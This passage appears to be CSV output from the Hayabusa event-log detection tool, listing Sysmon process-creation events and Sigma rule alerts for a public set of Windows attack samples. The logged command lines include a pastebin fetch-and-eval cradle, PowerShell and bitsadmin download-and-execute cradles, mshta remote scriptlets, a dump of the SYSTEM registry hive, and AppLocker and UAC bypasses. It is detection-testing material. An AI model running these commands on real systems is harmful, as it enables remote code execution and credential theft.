powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object 